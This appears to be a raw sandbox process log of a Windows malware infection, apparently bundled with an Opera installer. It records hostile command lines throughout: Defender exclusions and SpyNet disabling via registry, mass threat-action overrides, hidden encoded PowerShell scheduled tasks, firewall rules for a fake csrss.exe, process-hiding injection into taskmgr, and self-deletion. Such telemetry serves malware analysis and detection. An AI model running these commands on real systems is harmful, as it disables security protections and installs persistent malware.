C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e82e1a8,0x6e82e1b4,0x6e82e1c0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 532

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe" --version

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3460 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142125" --session-guid=77820e10-ad15-4e06-bd77-7e7f60bb5f81 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3208 -ip 3208

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe

C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b0,0x2c0,0x2c4,0x28c,0x2c8,0x6deae1a8,0x6deae1b4,0x6deae1c0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 528

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3752 -ip 3752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 1164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe

"C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe"

C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe

"C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe"

C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe

"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"

C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe

"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"

C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe

"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe

"C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe

.\Install.exe /YnGgdidyhQpz "385118" /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gVeYmuPuD" /SC once /ST 07:55:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gVeYmuPuD"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1308 -ip 1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 3444

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe

"C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNQTYWcCe" /SC once /ST 13:59:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNQTYWcCe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xd50040,0xd5004c,0xd50058

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gVeYmuPuD"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ntdxxty.exe\" id /Itsite_idoir 385118 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gNQTYWcCe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe\" id /KZsite_idnXc 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe id /KZsite_idnXc 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

